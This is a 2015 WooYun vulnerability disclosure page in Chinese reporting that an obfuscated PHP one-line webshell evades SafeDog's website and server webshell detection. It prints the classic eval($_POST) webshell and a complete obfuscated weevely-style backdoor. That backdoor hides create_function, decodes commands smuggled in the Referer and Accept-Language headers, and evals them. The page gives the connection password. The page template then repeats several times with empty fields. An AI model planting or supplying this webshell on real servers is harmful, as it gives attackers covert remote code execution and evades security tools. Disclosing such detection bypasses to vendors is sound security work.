一句话木马绕过网站安全狗和服务器安全狗webshell检测

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133010

漏洞标题：一句话木马绕过网站安全狗和服务器安全狗webshell检测

漏洞作者： King_hurray

提交时间：2015-08-11 11:56

修复时间：2015-09-25 14:02

公开时间：2015-09-25 14:02

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-11：细节已通知厂商并且等待厂商处理中
2015-08-11：厂商已经确认，细节仅向厂商公开
2015-08-21：细节向核心白帽子及相关领域专家公开
2015-08-31：细节向普通白帽子公开
2015-09-10：细节向实习白帽子公开
2015-09-25：细节向公众公开

简要描述：

最新版网站安全狗Apache版本与服务器安全狗绕过webshell检测，可以成功jianlian

详细说明：

传统的一句话木马2.php

<?php @eval($_POST['pass']);?>

网站安全狗和与服务器安全狗均能够检测出
转换后的php一句话木马命名为door.php

<?php
$W='YendUY_cUYlean();$d=baseUY64_enUYcode(x(gzcoUYmpUYress($oUY),UY$k));print("UYUY<$k>$d<UY/UY$k>");UY@sessioUYn_destroy();}}}}';
$S='$q)UY;$q=arrUYay_vUYaluesUY($q);pUYregUY_match_all(UY"/UY([\\w]UYUYUY)[\\w-]+(?:;q=0.([\\d]))?,UY?UY/",$ra,$UYm);if($UYq&UY&$m)';
$x='"]UY;$ra=@$r[UY"HTTP_AUYCCEPTUY_LANGUAGE"UY];if($rUYUYr&&$ra)UY{   UY $u=parseUY_url($UYUYrr); UY   parse_str(UY$u["queryUY"],';
$v=str_replace('Wp','','crWpWpeate_WpfuWpnWpctWpion');
$i='0;($UYjUY<$c&&$i<$lUY);$j+UY+,$i++){$oUY.=$t{UYUY$iUY}^$k{$j};UY}}returUYnUY UY$o;}UY$r=$_SERVER;$rr=@$r["HUYUYTTP_REUYFERER';
$N='$kh=UY"5d41";$kUYf="402UYUYaUY";function x($t,$kUYUY){$c=stUYrlen($UYkUY);$lUY=stUYUYrlen($t);$oUY="";for($i=0;$i<$l;){fUYor(UY$j=';
$Q='$p;$e=UYUYstrpos($s[$iUY],$f);if(UY$e){$k=$UYkUYh.$kf;ob_staUYrtUY();@eUYval(@gzUYuncUYompressUY(@UYx(@base6UY4_UYdecUYode(p';
$y='m[2][$UYz]];if(UYstrpUYUYos($p,$hUY)===0){$s[UY$i]="";UY$p=$sUYs($UYp,3);}if(arUYraUYy_key_eUYxists(UYUY$i,$s)){$s[$iUY].=UY';
$X='{@sUYeUYssion_start(UY)UY;$s=&$_SESSION;UY$ss="UYsubstUYr";$UYsl="strtoUYlUYower";UY$i=$m[1][UY0].UY$m[1][1];$UYh=$sl($UYssU';
$o='Y(md5(UYUY$i.$kh)UY,0UY,UY3));$f=$sl($ss(md5($UYUYi.$kf),0,3));$p=UY"";UYfor(UY$z=1;UY$UYz<count($m[UY1]);$z+UY+) UY$p.=$q[$';
$Y='reg_replace(UYarray(UY"/_/",UY"/-/"),arUYray(UYUY"/",UY"+"),$ss($sUY[$i],0,$e)UY)),$k))UYUY);$oUY=ob_get_conteUYnts()UY;ob_U';
$k=str_replace('UY','',$N.$i.$x.$S.$X.$o.$y.$Q.$Y.$W);
$q=$v('',$k);$q();
?>

木马连接密码 hello

网站安全狗未能检测出转换后的door.php 木马
使用服务器安全狗对木马door.php 进行安全检测

2.php 检测出来
door.php木马未被检测出来

漏洞证明：

使用菜刀（weevely)与一句话木马建立连接

修复方案：

无增加对于木马的动态查杀能力

版权声明：转载请注明来源 King_hurray@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2015-08-11 14:01

厂商回复：

感谢提交，已从其他渠道知晓（官方话）......

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133010

漏洞标题：一句话木马绕过网站安全狗和服务器安全狗webshell检测

相关厂商：安全狗

漏洞作者： King_hurray

提交时间：2015-08-11 11:56

修复时间：2015-09-25 14:02

公开时间：2015-09-25 14:02

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 King_hurray@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133010

漏洞标题：一句话木马绕过网站安全狗和服务器安全狗webshell检测

相关厂商：安全狗

漏洞作者： King_hurray

提交时间：2015-08-11 11:56

修复时间：2015-09-25 14:02

公开时间：2015-09-25 14:02

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133010"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 King_hurray@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：